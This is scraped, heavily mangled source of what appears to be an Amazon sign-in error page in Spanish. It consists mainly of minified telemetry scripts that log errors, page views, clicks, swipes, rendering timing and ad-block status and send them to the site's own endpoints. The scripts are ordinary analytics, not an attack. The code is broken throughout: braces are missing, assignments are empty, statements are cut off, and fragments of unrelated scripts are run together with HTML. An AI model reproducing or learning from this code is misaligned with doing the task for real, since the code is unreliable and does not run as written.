var n = r.logOptions || {
ent: {
page: ["pageType", "subPageType", "requestId"]
l("log", function(n) {
return o = c.UUID(), t = {
messageId: o,
schemaId: r.schemaId || "<ns>.Error.6",
errorMessage: n.m || null,
attribution: n.attribution || null,
logLevel: "FATAL",
url: null,
file: null,
line: null,
column: null,
stack: n.s || [],
context: n.cinfo || {},
metadata: {}
}, n.logLevel && (t.logLevel = "" + n.logLevel), u.forEach(function(e) {
n[e] && (t.metadata[e] = n[e])
}), "INFO" === n.logLevel || Object.keys(i).forEach(function(e) {
"number" != typeof n[i[e]] && "string" != typeof n[i[e]] || (t[e] = "" + n[i[e]])
}), t
}(e), n)
c.register("Errors", {
instance: function(e) {
return new r(e || {})
logError: n("jsError"),
logWarn: n("jsWarn")
csa.plugin(function(o) {
var r, e, n, t, a, i = "function",
u = "willDisappear",
f = "$app.",
p = "$document.",
c = "focus",
s = "blur",
d = "active",
l = "resign",
$ =,
b = o.exec,
m = o.config["Transport.AnonymizeRequests"] || !1,
g = o("Events"),
h = $.location,
v = $.document || {},
y = $.P || {},
P = (($.performance || {}).navigation || {}).type,
w = o.on,
k = o.emit,
E = v.hidden,
T = {};
h && v && (w($, "beforeunload", D), w($, "pagehide", D), w(v, "visibilitychange", R(p, function() {
return v.visibilityState || "unknown"
})), w(v, c, R(p + c)), w(v, s, R(p + s)), y.when && y.when("mash").execute(function(e) {
e && (w(e, "appPause", R(f + "pause")), w(e, "appResume", R(f + "resume")), R(f + "deviceready")(), $.cordova && $.cordova.platformId && R(f + cordova.platformId)(), w(v, d, R(f + d)), w(v, l, R(f + l)))
}), e = $.app || {}, n = b(function() {
k(f + "willDisappear"), D()
}), a = typeof(t = e[u]) == i, e[u] = b(function() {
n(), a && t()
}), $.app || ($.app = e), "complete" === v.readyState ? A() : w($, "load", A), E ? S() : x(), o.on("$app.blur", S), o.on("$app.focus", x), o.on("$document.blur", S), o.on("$document.focus", x), o.on("$document.hidden", S), o.on("$document.visible", x), o.register("SPA", {
newPage: I
}), I({
transitionType: {
0: "hard",
1: "refresh",
2: "back-button"
} [P] || "unknown"
function I(n, e) {
var t = !!r,
a = (e = e || {}).keepPageAttributes;
t && (k("$beforePageTransition"), k("$pageTransition")), t && !a && g("removeEntity", "page"), r = o.UUID(), a ? = r : T = {
schemaId: "<ns>.PageEntity.2",
id: r,
url: m ? h.href.split("?")[0] : h.href,
server: h.hostname,
path: h.pathname,
referrer: m ? v.referrer.split("?")[0] : v.referrer,
title: v.title
}, Object.keys(n || {}).forEach(function(e) {
T[e] = n[e]
}), g("setEntity", {
page: T
}), k("$pageChange", T, {
buffered: 1
}), t && k("$afterPageTransition")
function A() {
k("$load"), k("$ready"), k("$afterload")
function D() {
k("$ready"), k("$beforeunload"), k("$unload"), k("$afterunload")
function S() {
E || (k("$visible", !1, {
buffered: 1
}), E = !0)
function x() {
E && (k("$visible", !0, {
buffered: 1
}), E = !1)
function R(n, t) {
return b(function() {
var e = typeof t == i ? n + t() : n;
csa.plugin(function(c) {
var e = "Events",
n = "UNKNOWN",
s = "id",
a = "all",
i = "messageId",
o = "timestamp",
u = "producerId",
r = "application",
f = "obfuscatedMarketplaceId",
d = "entities",
l = "schemaId",
p = "version",
v = "attributes",
g = "<ns>",
b = "lob",
t = "session",
h = c.config,
m = ( || {}).host,
I = h[e + ".Namespace"] || "csa_other",
y = h.Application || "Other" + (m ? ":" + m : ""),
O = h["Transport.AnonymizeRequests"] || !1,
E = c("Transport"),
U = {},
A = function(e, t) {
function N(n, i, o) {
A(i, function(e) {
var t = o === a || (o || {})[e];
e in n || (n[e] = {
version: 1,
id: i[e][s] || c.UUID()
}), S(n[e], i[e], t)
function S(t, n, i) {
A(n, function(e) {
! function(e, t, n) {
return "string" != typeof t && e !== p ? c.error("Attribute is not of type string: " + e) : !0 === n || 1 === n || (e === s || !!~(n || []).indexOf(e))
}(e, n[e], i) || (t[e] = n[e])
function k(o, e, r) {
A(e, function(e) {
var t = o[e];
if (t[l]) {
var n = {},
i = {};
n[s] = t[s], n[u] = t[u] || r[u], n[l] = t[l], n[p] = t[p]++, n[v] = i, w(n, r), S(i, t, 1), D(i), E("log", n)
function w(e, t) {
e[o] = function(e) {
return "number" == typeof e && (e = new Date(e).toISOString()), e || c.time("ISO")
}(e[o]), e[i] = e[i] || c.UUID(), e[r] = y, e[f] = h.ObfuscatedMarketplaceId || n, e[l] = e[l].replace(g, I), t && t[b] && (e[b] = t[b])
function D(e) {
delete e[p], delete e[l], delete e[u]
function T(o) {
var r = {};
this.log = function(e, t) {
var n = {},
i = (t || {}).ent;
return e ? "string" != typeof e[l] ? c.error("A valid schema id is required for the event") : (w(e, o), N(n, U, i), N(n, r, i), N(n, e[d] || {}, i), A(n, function(e) {
}), e[u] = o[u], e[d] = n, t && t[b] && (e[b] = t[b]), void E("log", e, t)) : c.error("The event cannot be undefined")
}, this.setEntity = function(e) {
O && delete e[t], N(r, e, a), k(r, e, o)
h["KillSwitch." + e] || c.register(e, {
setEntity: function(e) {
O && delete e[t], c.emit("$entities.set", e, {
buffered: 1
}), N(U, e, a), k(U, e, {
producerId: "csa",
lob: h[b] || "0"
removeEntity: function(e) {
delete U[e]
instance: function(e) {
return new T(e)
csa.plugin(function(s) {
var c, g = "Transport",
l = "post",
f = "preflight",
r = "csa.cajun.",
i = "store",
a = "deleteStored",
u = "sendBeacon",
t = "__merge",
e = "messageId",
n = ".FlushInterval",
o = 0,
d = s.config[g + ".BufferSize"] || 2e3,
h = s.config[g + ".RetryDelay"] || 1500,
p = s.config[g + ".AnonymizeRequests"] || !1,
v = {},
y = 0,
m = [],
E =,
R = E.document,
b = s.timeout,
k = E.Object.keys,
w = s.config[g + n] || 5e3,
I = w,
O = s.config[g + n + ".BackoffFactor"] || 1,
S = s.config[g + n + ".BackoffLimit"] || 3e4,
B = 0;
function T(n) {
if (864e5 < s.time() - +new Date(n.timestamp)) return s.warn("Event is too old: " + n);
y < d && (n[e] in v || (v[n[e]] = n, y++), "function" == typeof n[t] && n[t](v[n[e]]), !B && o && (B = b(q, function() {
var n = I;
return I = Math.min(n * O, S), n
function q() {
m.forEach(function(e) {
var o = [];
k(v).forEach(function(n) {
var t = v[n];
e.accepts(t) && o.push(t)
}), o.length && (e.chunks ? e.chunks(o).forEach(function(n) {
D(e, n)
}) : D(e, o))
}), v = {}, B = 0
function D(t, e) {
function o() {
s[a](r + n)
var n = s.UUID();
s[i](r + n, JSON.stringify(e)), [function(n, t, e) {
var o = E.navigator || {},
r = E.cordova || {};
if (p) return 0;
if (!o[u] || !n[l]) return 0;
n[f] && r && "ios" === r.platformId && !c && ((new Image).src = n[f]().url, c = 1);
var i = n[l](t);
if (!i.type && o[u](i.url, i.body)) return e(), 1
}, function(n, t, e) {
if (!n[l]) return 0;
var o = n[l](t),
r = o.url,
i = o.body,
c = o.type,
f = new XMLHttpRequest,
a = 0;
function u(n, t, e) {"POST", n), f.withCredentials = !p, e && f.setRequestHeader("Content-Type", e), f.send(t)
return f.onload = function() {
f.status < 299 ? e() : s.config[g + ".XHRRetries"] && a < 3 && b(function() {
u(r, i, c)
}, ++a * h)
}, u(r, i, c), 1
}].some(function(n) {
try {
return n(t, e, o)
} catch (n) {}
k && (s.once("$afterload", function() {
o = 1,
function(e) {
(s[i]() || []).forEach(function(n) {
if (!n.indexOf(r)) try {
var t = s[i](n);
s[a](n), JSON.parse(t).forEach(e)
} catch (n) {
}(T), s.on(R, "visibilitychange", q, !1), q()
}), s.once("$afterunload", function() {
o = 1, q()
}), s.on("$afterPageTransition", function() {
y = 0, I = w
}), s.register(g, {
log: T,
register: function(n) {
csa.plugin(function(n) {
var r = n.config["Events.SushiEndpoint"];
n("Transport")("register", {
accepts: function(n) {
return n.schemaId
post: function(n) {
var t = {
return {
data: n
return {
url: r,
body: JSON.stringify({
events: t
preflight: function() {
var n, t = /\/\/(.*?)\//.exec(r);
return t && t[1] && (n = "https://" + t[1] + "/ping"), {
url: n
chunks: function(n) {
for (var t = []; 500 < n.length;) t.push(n.splice(0, 500));
return t.push(n), t
csa.plugin(function(n) {
var t, a, o, r, e = n.config,
i = "PageViews",
d = e[i + ".ImpressionMinimumTime"] || 1e3,
s = "hidden",
c = "innerHeight",
l = "innerWidth",
g = "renderedTo",
f = g + "Viewed",
m = g + "Meaningful",
u = g + "Impressed",
p = 1,
v = 2,
h = 3,
w = 4,
y = 5,
P = "loaded",
b = 7,
I = 8,
T =,
E = n.on,
V = n("Events", {
producerId: "csa",
lob: e.lob || "0"
$ = T.document,
M = {},
S = {},
H = y;
function K(e) {
if (!M[b]) {
var i;
if (M[e] = n.time(), e !== h && e !== P || (t = t || M[e]), t && H === w) a = a || M[e], (i = {})[m] = t - o, i[f] = a - o, R("PageView.5", i), r = r || n.timeout(j, d);
if (e !== y && e !== p && e !== v || (clearTimeout(r), r = 0), e !== p && e !== v || R("PageRender.4", {
transitionType: e === p ? "hard" : "soft"
}), e === b)(i = {})[m] = t - o, i[f] = a - o, i[u] = M[e] - o, R("PageImpressed.3", i)
function R(e, i) {
S[e] || (i.schemaId = "<ns>." + e, V("log", i, {
ent: "all"
}), S[e] = 1)
function W() {
0 === T[c] && 0 === T[l] ? (H = I, n("Events")("setEntity", {
page: {
viewport: "hidden-iframe"
})) : H = $[s] ? y : w, K(H)
function j() {
K(b), r = 0
function k() {
var e = o ? v : p;
M = {}, S = {}, a = t = 0, o = n.time(), K(e), W()
function q() {
var e = $.readyState;
"interactive" === e && K(h), "complete" === e && K(P)
e["KillSwitch." + i] || ($ && void 0 !== $[s] ? (k(), E($, "visibilitychange", W, !1), E($, "readystatechange", q, !1), E("$afterPageTransition", k), E("$timing:loaded", q), n.once("$load", q)) : n.warn("Page visibility not supported"))
csa.plugin(function(c) {
var s = c.config["Interactions.ParentChainLength"] || 35,
e = "click",
r = "touches",
f = "timeStamp",
o = "length",
u = "pageX",
g = "pageY",
p = "pageXOffset",
h = "pageYOffset",
m = 250,
v = 5,
d = 200,
l = .5,
t = {
capture: !0,
passive: !0
X =,
Y = c.emit,
n = c.on,
x = X.Math.abs,
a = (X.document || {}).documentElement || {},
y = {
x: 0,
y: 0,
t: 0,
sX: 0,
sY: 0
N = {
x: 0,
y: 0,
t: 0,
sX: 0,
sY: 0
function b(t) {
if ( return "//*[@id='" + + "']";
var e = function(t) {
var e, n = 1;
for (e = t.previousSibling; e; e = e.previousSibling) e.nodeName === t.nodeName && (n += 1);
return n
n = t.nodeName;
return 1 !== e && (n += "[" + e + "]"), t.parentNode && (n = b(t.parentNode) + "/" + n), n
function I(t, e, n) {
var a = c("Content", {
target: n
i = {
schemaId: "<ns>.ContentInteraction.2",
interaction: t,
interactionData: e,
messageId: c.UUID()
if (n) {
var r = b(n);
r && (i.attribution = r);
var o = function(t) {
for (var e = t, n = e.tagName, a = !1, i = t ? t.href : null, r = 0; r < s; r++) {
if (!e || !e.parentElement) {
a = !0;
n = (e = e.parentElement).tagName + "/" + n, i = i || e.href
return a || (n = ".../" + n), {
pc: n,
hr: i
o.pc && (i.interactionData.parentChain = o.pc), && (i.interactionData.href =
a("log", i), Y("$content.interaction", {
e: i,
w: a
function i(t) {
I(e, {
interactionX: "" + t.pageX,
interactionY: "" + t.pageY
function C(t) {
if (t && t[r] && 1 === t[r][o]) {
var e = t[r][0];
N = y = {
x: e[u],
y: e[g],
t: t[f],
sX: X[p],
sY: X[h]
function D(t) {
if (t && t[r] && 1 === t[r][o] && y && N) {
var e = t[r][0],
n = t[f],
a = n - N.t,
i = {
x: e[u],
y: e[g],
t: n,
sX: X[p],
sY: X[h]
N = i, d <= a && (y = i)
function E(t) {
if (t) {
var e = x(y.x - N.x),
n = x(y.y - N.y),
a = x(y.sX - N.sX),
i = x(y.sY - N.sY),
r = t[f] - y.t;
if (m < 1e3 * e / r && v < e || m < 1e3 * n / r && v < n) {
var o = n < e;
o && a && e * l <= a || !o && i && n * l <= i || I((o ? "horizontal" : "vertical") + "-swipe", {
interactionX: "" + y.x,
interactionY: "" + y.y,
endX: "" + N.x,
endY: "" + N.y
}, y.e)
n(a, e, i, t), n(a, "touchstart", C, t), n(a, "touchmove", D, t), n(a, "touchend", E, t)
csa.plugin(function(r) {
var a, o, t, c, e, n = "MutationObserver",
f = "observe",
u = "disconnect",
i = "mutObs",
l = "_csa_flt",
b = "_csa_llt",
m = "_csa_mr",
d = "_csa_mi",
v = "lastChild",
p = "length",
_ = {
childList: !0,
subtree: !0
g = 10,
h = 25,
s = 1e3,
y = 4,
O =,
k = O.document,
w = k.body || k.documentElement,
I =,
L = [],
B = [],
M = [],
Y = 0,
$ = 0,
x = 0,
A = 1,
C = [],
D = [],
E = 0,
F = r.blank,
N = {
buffered: 1
S = 0;
function T(e) { || r.emit("$csmTag:" + e, 0, N)
I && O[n] ? (T(i + "Yes"), Y = 0, o = new O[n](j), (t = new O[n](V))[f](w, {
attributes: !0,
subtree: !0,
attributeFilter: ["src"],
attributeOldValue: !0
}), F = r.on(O, "scroll", q, {
passive: !0
}), r.once("$ready", H), A && (G(), e = r.interval(z, s)), r.register("SpeedIndexBuffers", {
getBuffers: function(e) {
e && (H(), q(), e(Y, C, L, B, M), o && o[u](), t && t[u](), F())
registerListener: function(e) {
a = e
replayModuleIsLive: function() {
r.timeout(H, 0)
})) : T(i + "No");
function V(e) {
t: I(),
m: e
function j(e) {
t: I(),
m: e
}), S || T(i + "Active"), S = x = 1, a && a()
function q() {
x && (M.push({
t: I(),
y: $
}), $ = O.pageYOffset, x = 0)
function z() {
var e = I();
(!c || s < e - c) && G()
function G() {
for (var e = w, t = I(), n = [], u = [], i = 0, s = 0; e;) e[l] ? ++i : (e[l] = t, n.push(e), s = 1), u[p] < y && u.push(e), e[d] = E, e[b] = t, e = e[v];
s && (i < D[p] && function(e) {
for (var t = e, n = D[p]; t < n; t++) {
var u = D[t];
if (u) {
if (u[m]) break;
if (u[d] < E) {
u[m] = 1, o[f](u, _);
}(i), D = u, C.push({
t: t,
m: n
}), ++E, x = s, a && a()), A && r.timeout(G, s ? g : h), c = t
function H() {
A && (A = 0, e && O.clearInterval(e), e = null, G(), o[f](w, _))
var ue_csa_ss_tag = false;
csa.plugin(function(b) {
var a =,
e = a.uet,
f = a.uex,
c = a.ue,
d = a.Object,
g = 0,
h = {
largestContentfulPaint: "lcp",
speedIndex: "si",
atfSpeedIndex: "atfsi",
visuallyLoaded50: "vl50",
visuallyLoaded90: "vl90",
visuallyLoaded100: "vl100"
l = "perfNo perfYes browserQuiteFn browserQuiteUd browserQuiteLd browserQuiteMut mutObsNo mutObsYes mutObsActive startVL endVL".split(" ");
b && e && f && d.keys && c && (b.once("$ditched.beforemitigation", function() {
g = 1
}), d.keys(h).forEach(function(k) {
b.on("$timing:" + k, function(b) {
var a = h[k];
if (c.isl || g) {
var d = "csa:" + a;
e(a, d, void 0, b);
f("at", d)
} else e(a, void 0, void 0, b)
}), a.ue_csa_ss_tag || l.forEach(function(a) {
b.on("$csmTag:" + a, function() {
c.tag && c.tag(a);
(c.isl || g) && f("at", "csa:" + a)
}, {
buffered: 1
<script type='text/javascript'>
(function() {
function l(a) {
for (var c ="&"), e = 0; e < c.length; e++) {
var d = c[e].split("=");
if (d[0] === a) return d[1]
window.amzn = window.amzn || {};
amzn.copilot = amzn.copilot || {};
var b = window,
f = document,
g = b.P || b.AmazonUIPageJS,
h = f.head || f.getElementsByTagName("head")[0],
m = 0,
n = 0;
amzn.copilot.checkCoPilotSession = function() {
f.cookie.match("cpidv") && ("undefined" !== typeof jQuery && k(jQuery), g && g.when && g.when("jQuery").execute(function(a) {
}), b.amznJQ && b.amznJQ.available && b.amznJQ.available("jQuery",
function() {
}), b.jQuery || g || b.amznJQ || q())
var q = function() {
m ? b.ue && "function" === typeof b.ue.count && b.ue.count("cpJQUnavailable", 1) : (m = 1, f.addEventListener ? f.addEventListener("DOMContentLoaded", amzn.copilot.checkCoPilotSession, !1) : f.attachEvent && f.attachEvent("onreadystatechange", function() {
"complete" === f.readyState && amzn.copilot.checkCoPilotSession()
k = function(a) {
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n = 1;
amzn.copilot.jQuery = a;
a = l("debugJS");
var c = "https:" === b.location.protocol ? 1 : 0,
e = 1;
url = "/gp/copilot/handlers/copilot_strings_resources.html";
window.texas && texas.locations && (url = texas.locations.makeUrl(url));
g && g.AUI_BUILD_DATE && (e = 0);
amzn.copilot.jQuery.ajax && amzn.copilot.jQuery.ajax({
url: url,
dataType: "json",
data: {
isDebug: a,
isSecure: c,
includeAUIP: e
success: function(a) { = a.serviceEndPoint;
amzn.copilot.enableMultipleTabSession = a.isFollowMe;
error: function() {
b.ue.count("cpLoadResourceError", 1)
r = function(a) {
var c = amzn.copilot.jQuery,
e = function() {
isContinuedSession: !0
}, a))
a.CSSUrls &&
c.each(a.CSSUrls[0], function(a, c) {
var b = f.createElement("link");
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c.each(b, function(a, c) {
a === b.length - 1 ? p(c, d, e) : p(c, d)
a.JSTag && (t(a.JSTag), P.when("CSCoPilotPresenterAsset").execute(function() {
t = function(a) {
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b.innerHTML = a;
a = 0;
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d.src = a;
d.async = b ? !1 : !0;
e && (d.onload = e);
window.ue && ue.count && ue.count('CSMLibrarySize', 18524)
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<table cellpadding="4" border="0" align="center" width="800">
<td style="padding: 10px">
<img src="" />
<div id="ap_error_page_title" class="ap_error_page_title">
<h1>Ha surgido un problema</h1>
<div id="ap_error_page_message" class="ap_error_page_message">
Lo sentimos. Ha ocurrido un error al iniciar sesión. Por favor, vuelva a intentarlo.
<div id="ap_error_return_home" class="ap_error_return_home">
<img src="" />
Volver a la página de inicio de
<a href="">Iniciar sesión.</a>
<div id='be' style="display:none;visibility:hidden;">
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function h(b, a) {
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function k() {
ue.uels = g;
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c.ue && (ue.uels = h, c.ue.attach && c.ue.attach("load", k))
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h.ue.exec(t, "csm-android-check")() && b.tags instanceof Array && (c = -1 != b.tags.indexOf("usesAppStartTime") || b.transition.type ? !b.transition.type && -1 <
b.tags.indexOf("usesAppStartTime") ? "warm-start" : void 0 : "view-transition", c && (b.transition.type = c));
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"reload" === e._nt && h.ue_orct || "intrapage-transition" === e._nt ? u(b) : "undefined" === typeof e._nt && f && f.timing && f.timing.navigationStart && a.history && "function" === typeof a.History && "object" === typeof a.history && a.history.length && 1 != a.history.length && (b.timing.transitionStart = f.timing.navigationStart);
p && e.ssw(q, "" + (b.timing.transitionStart || n || ""));
c = b.transition;
d = e._nt ? e._nt : void 0;
c.subType = d;
a.ue &&
a.ue.tag && a.ue.tag("has-AMZNPerformance");
e.isl && a.uex && a.uex("at", "csm-timing");
function w(c) {
a.ue && a.ue.count && a.ue.count("csm-cordova-plugin-failed", 1)
function t() {
return a.cordova && a.cordova.platformId && "android" == a.cordova.platformId
function u() {
if (p) {
var c = e.ssw(q),
a = function() {},
x = e.count || a,
a = e.tag || a,
k = b.timing.transitionStart,
g = c && !c.e && c.val;
n = c = g ? +c.val : null;
k && g && k > c ? (x("csm.jumpStart.mtsDiff", k - c || 0), a("csm-rld-mts-gt")) : k && g ? a("csm-rld-mts-leq") : g ? k || a("csm-rld-mts-no-new") : a("csm-rld-mts-no-old")
f &&
f.timing && f.timing.navigationStart ? b.timing.transitionStart = f.timing.navigationStart : delete b.timing.transitionStart
function v() {
try {
a.P.register("AMZNPerformance", function() {
return b
} catch (c) {}
function r() {
if (!b) return "";
ue_mbl.cnt = null;
var c = b.timing,
d = b.transition,
d = ["mts", l(c.transitionStart), "mps", l(c.processStart), "mtt", d.type, "mtst", d.subType, "mtlt", d.launchType];
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function l(a) {
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function y(a, d) {
b && (m = d, b.timing.transitionStart = a, b.transition.type = "view-transition", b.transition.subType = "ajax-transition", b.transition.launchType = "normal", ue_mbl.cnt = r)
var e = h.ue || {},
m = h.ue_t0,
q = "csm-last-mts",
p = 1 === h.ue_sswmts,
n, f = a.performance,
if (a.P && a.P.when && a.P.register) return 1 === a.ue_fnt && (m = a.aPageStart ||
h.ue_t0), a.P.when("CSMPlugin").execute(function(a) {
a.buildAMZNPerformance && a.buildAMZNPerformance({
successCallback: s,
failCallback: w
}), {
cnt: r,
ajax: y
}, "mobile-timing")(ue_csm, ue_csm.window);
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c = b("Width"),
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c && b && (a += "&vw=" + c + "&vh=" + b);
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function d(a) {
c && c("log", a)
var b = document.ue_backdetect,
c = a.csa && a.csa("Errors", {
producerId: "csa",
logOptions: {
ent: "all"
a.ue_err.buffer && c && (a.ue_err.buffer.forEach(d), a.ue_err.buffer.push = d);
b && b.ue_back && a.ue && (a.ue.bfini = b.ue_back.value);
a.uet && a.uet("be");
a.onLdEnd && (window.addEventListener ? window.addEventListener("load", a.onLdEnd, !1) : window.attachEvent && window.attachEvent("onload", a.onLdEnd));
a.ueh && a.ueh(0, window, "load", a.onLd, 1);
a.ue && a.ue.tag && (a.ue_furl ? (b = a.ue_furl.replace(/\./g,
"-"), a.ue.tag(b)) : a.ue.tag("nofls"))
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function d(a, d) {
var b = {};
if (!e || !f) try {
var c = h.sessionStorage;
c ? a && ("undefined" !== typeof d ? c.setItem(a, d) : b.val = c.getItem(a)) : f = 1
} catch (g) {
e = 1
e && (b.e = 1);
return b
var b = g.ue || {},
a = "",
f, e, c, a = d("csmtid");
f ? a = "NA" : a.e ? a = "ET" : (a = a.val, a || (a = b.oid || "NI", d("csmtid", a)), c = d(b.oid), c.e || (c.val = c.val || 0, d(b.oid, c.val + 1)), b.ssw = d);
b.tabid = a
})(ue_csm, ue_csm.window);
ue_csm.ue.exec(function(e, f) {
var a = e.ue || {},
b = a._wlo,
if (a.ssw) {
d = a.ssw("CSM_previousURL").val;
var c = f.location,
b = b ? b : c && c.href ? c.href.split("#")[0] : void 0;
c = (b || "") === a.ssw("CSM_previousURL").val;
!c && b && a.ssw("CSM_previousURL", b);
d = c ? "reload" : d ? "intrapage-transition" : "first-view"
} else d = "unknown";
a._nt = d
}, "NavTypeModule")(ue_csm, window);
ue_csm.ue.exec(function(c, a) {
function g(a) { {
d.tag("csm-feature-" + + ":" + e);
d.isl && c.uex("at")
if (a.addEventListener)
for (var d = c.ue || {}, f = [{
name: "touch-enabled",
run: function(b) {
var e = function() {
a.removeEventListener("touchstart", c, !0);
a.removeEventListener("mousemove", d, !0)
c = function() {
d = function() {
a.addEventListener("touchstart", c, !0);
a.addEventListener("mousemove", d, !0)
}], b = 0; b < f.length; b++) g(f[b])
}, "csm-features")(ue_csm, window);
(function(a, e) {
function d(a) {
b && b("recordCounter", a.c, a.v)
var c = e.images,
b = a.csa && a.csa("Metrics", {
producerId: "csa"
c && c.length && a.ue.count("totalImages", c.length); && b && (, = d)
})(ue_csm, document);
(function(b) {
function c() {
var d = [];
a.log && a.log.isStub && a.log.replay(function(a) {
e(d, a)
a.clog && a.clog.isStub && a.clog.replay(function(a) {
e(d, a)
d.length && (a._flhs += 1, n(d), p(d))
function g() {
a.log && a.log.isStub && (a.onflush && a.onflush.replay && a.onflush.replay(function(a) {
}), a.onunload && a.onunload.replay && a.onunload.replay(function(a) {
}), c())
function e(d, b) {
var c = b[1],
f = b[0],
e = {};
a._lpn[c] = (a._lpn[c] || 0) + 1;
e[c] = f;
function n(b) {
q && (a._lpn.csm = (a._lpn.csm || 0) + 1, b.push({
csm: {
k: "chk",
f: a._flhs,
l: a._lpn,
s: "inln"
function p(a) {
if (h) a = k(a), b.navigator.sendBeacon(l, a);
else {
a = k(a);
var c = new b[f];"POST", l, !0);
c.setRequestHeader && c.setRequestHeader("Content-type", "text/plain");
function k(a) {
return JSON.stringify({
rid: b.ue_id,
sid: b.ue_sid,
mid: b.ue_mid,
mkt: b.ue_mkt,
sn: b.ue_sn,
reqs: a
var f = "XMLHttpRequest",
q = 1 === b.ue_ddq,
a = b.ue,
r = b[f] && "withCredentials" in new b[f],
h = b.navigator && b.navigator.sendBeacon,
l = "//" + b.ue_furl + "/1/batch/1/OE/",
m = b.ue_fci_ft || 5E3;
a && (r || h) &&
(a._flhs = a._flhs || 0, a._lpn = a._lpn || {}, a.attach && (a.attach("beforeunload", a.exec(g, "fcli-bfu")), a.attach("pagehide", a.exec(g, "fcli-ph"))), m && b.setTimeout(a.exec(c, "fcli-t"), m), a._ffci = a.exec(c))
(function(k, c) {
function l(a, b) {
return a.filter(function(a) {
return a.initiatorType == b
function f(a, c) {
if (b.t[a]) {
var g = b.t[a] - b._t0,
e = c.filter(function(a) {
return 0 !== a.responseEnd && m(a) < g
f = l(e, "script"),
h = l(e, "link"),
k = l(e, "img"),
n = {
}).filter(function(a, b, c) {
return a && c.lastIndexOf(a) == b
q = e.filter(function(a) {
return a.duration < p
s = g - Math.max.apply(null, < r | 0;
"af" == a && (b._afjs = f.length);
return a + ":" + [e[d], f[d], h[d], k[d], n[d], q[d], s].join("-")
function m(a) {
return a.responseEnd - (b._t0 - c.timing.navigationStart)
function n() {
var a = c[h]("resource"),
d = f("cf", a),
g = f("af", a),
a = f("ld", a);
delete b._rt;
b._ld = b.t.ld - b._t0;
b._art && b._art();
return [d, g, a].join("_")
var p = 20,
r = 50,
d = "length",
b = k.ue,
h = "getEntriesByType";
b._rre = m;
b._rt = c && c.timing && c[h] && n
})(ue_csm, window.performance);
(function(c, d) {
var b = c.ue,
a = d.navigator;
b && b.tag && a && (a = a.connection || a.mozConnection || a.webkitConnection) && a.type && b.tag("netInfo:" + a.type)
})(ue_csm, window);
(function(c, d) {
function h(a, b) {
for (var c = [], d = 0; d < a.length; d++) {
var e = a[d],
f = b.encode(e);
if (e[k]) {
var g = b.metaSep,
e = e[k],
l = b.metaPairSep,
h = [],
m = void 0;
for (m in e) e.hasOwnProperty(m) && h.push(m + "=" + e[m]);
e = h.join(l);
f += g + e
return c.join(b.resourceSep)
function s(a) {
var b = a[k] = a[k] || {};
b[t] || (b[t] = c.ue_mid);
b[u] || (b[u] = c.ue_sid);
b[f] || (b[f] = c.ue_id);
b.csm = 1;
a = "//" + c.ue_furl + "/1/" + a[v] + "/1/OP/" + a[w] + "/" + a[x] + "/" + h([a], y);
if (n) try {[p], a)
} catch (g) {
c.ue.sbf = 1, (new Image).src = a
} else(new Image).src =
function q() {
g && g.isStub && g.replay(function(a, b, c) {
a = a[0];
b = a[k] = a[k] || {};
b[f] = b[f] || c;
l.impression = s;
g = null
if (!(1 < c.ueinit)) {
var k = "metadata",
x = "impressionType",
v = "foresterChannel",
w = "programGroup",
t = "marketplaceId",
u = "session",
f = "requestId",
p = "navigator",
l = c.ue || {},
n = d[p] && d[p].sendBeacon,
r = function(a, b, c, d) {
return {
encode: d,
resourceSep: a,
metaSep: b,
metaPairSep: c
y = r("", "?", "&", function(a) {
return h(a.impressionData, z)
z = r("/", ":", ",", function(a) {
return a.featureName + ":" + h(a.resources,
A = r(",", "@", "|", function(a) {
g = l.impression;
n ? q() : (l.attach("load", q), l.attach("beforeunload", q));
try {
d.P && d.P.register && d.P.register("impression-client", function() {})
} catch (B) {
c.ueLogError(B, {
logLevel: "WARN"
})(ue_csm, window);
var ue_pty = "AuthenticationPortal";
var ue_spty = "Error404Page";
var ue_adb = 4;
var ue_adb_rtla = 1;
ue_csm.ue.exec(function(y, a) {
function t() {
if (d && f) {
var a;
a: {
try {
a = d.getItem(g);
break a
} catch (c) {}
a = void 0
if (a) return b = a, !0
return !1
function u() {
if (a.fetch) fetch(m).then(function(a) {
if (!a.ok) throw Error(a.statusText);
return a.text ? a.text() : null
}).then(function(b) {
b ? (-1 < b.indexOf("window.ue_adb_chk = 1") && (a.ue_adb_chk = 1), n()) : h()
else e.uels(m, {
onerror: h,
onload: n
function h() {
b = k;
if (f) try {
d.setItem(g, b)
} catch (a) {}
function n() {
b = 1 === a.ue_adb_chk ? p : k;
if (f) try {
} catch (c) {}
function q() {
a.ue_adb_rtla && c && 0 < && !1 === r && (c.elh = null, ueLogError({
m: "Hit Info",
fromOnError: 1
}, {
logLevel: "INFO",
adb: b
}), r = !0)
function l() {
e.isl && a.uex && uex("at", b);
s && s.updateCsmHit("adb", b);
c && 0 < ? q() : a.ue_adb_rtla && c && (c.elh = q)
function v() {
return b
if (a.ue_adb) {
a.ue_fadb = a.ue_fadb || 10;
var e = a.ue,
k = "adblk_yes",
p = "adblk_no",
m = "",
b = "adblk_unk",
a: {
try {
d = a.localStorage;
break a
} catch (z) {}
d = void 0
var g = "csm:adb",
c = a.ue_err,
s = e.cookie,
f = void 0 !== a.localStorage,
w = Math.random() > 1 - 1 / a.ue_fadb,
r = !1,
x = t();
w || !x ? u() : l();
a.ue_isAdb = v;
a.ue_isAdb.unk = "adblk_unk"; = p;
a.ue_isAdb.yes = k
}, "adb")(document, window);
(function(c, l, m) {
function h(a) {
if (a) try {
if ( return "//*[@id='" + + "']";
var b, d = 1,
for (e = a.previousSibling; e; e = e.previousSibling) e.nodeName === a.nodeName && (d += 1);
b = d;
var c = a.nodeName;
1 !== b && (c += "[" + b + "]");
a.parentNode && (c = h(a.parentNode) + "/" + c);
return c
} catch (f) {
return "DETACHED"
function f(a) {
if (a && a.getAttribute) return a.getAttribute(k) ? a.getAttribute(k) : f(a.parentElement)
var k = "data-cel-widget",
g = !1,
d = [];
(c.ue || {}).isBF = function() {
try {
var a = JSON.parse(localStorage["csm-bf"] || "[]"),
b = 0 <= a.indexOf(c.ue_id);
a = a.slice(0, 20);
localStorage["csm-bf"] = JSON.stringify(a);
return b
} catch (d) {
return !1
c.ue_utils = {
getXPath: h,
getFirstAscendingWidget: function(a, b) {
c.ue_cel && c.ue_fem ? !0 === g ? b(f(a)) : d.push({
element: a,
callback: b
}) : b()
notifyWidgetsLabeled: function() {
if (!1 === g) {
g = !0;
for (var a = f, b = 0; b < d.length; b++)
if (d[b].hasOwnProperty("callback") && d[b].hasOwnProperty("element")) {
var c = d[b].callback,
e = d[b].element;
